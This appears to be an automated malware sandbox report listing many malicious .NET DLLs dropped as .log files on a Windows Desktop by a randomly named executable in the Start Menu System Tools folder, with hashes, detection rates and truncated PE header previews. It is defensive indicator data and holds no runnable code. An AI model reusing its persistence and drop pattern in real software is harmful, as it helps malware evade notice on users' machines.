                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\EzoTkVXm.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\FFhdxwlL.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\FFnbpIFd.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\FIZLHNPh.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\FJIjaFCP.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\FUptAQNB.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\FxxLTNKF.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\GGiDqFDB.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\GOTKaosQ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\GrWSIakL.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\HJAvhXOf.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\HPmLzFXY.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\HgsdOaRa.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\HhaNcSpz.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\HxVaNNSD.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\IJUlMoHw.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\IQFswXwL.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\IQXUcfJd.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ITPCmwoz.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 29%
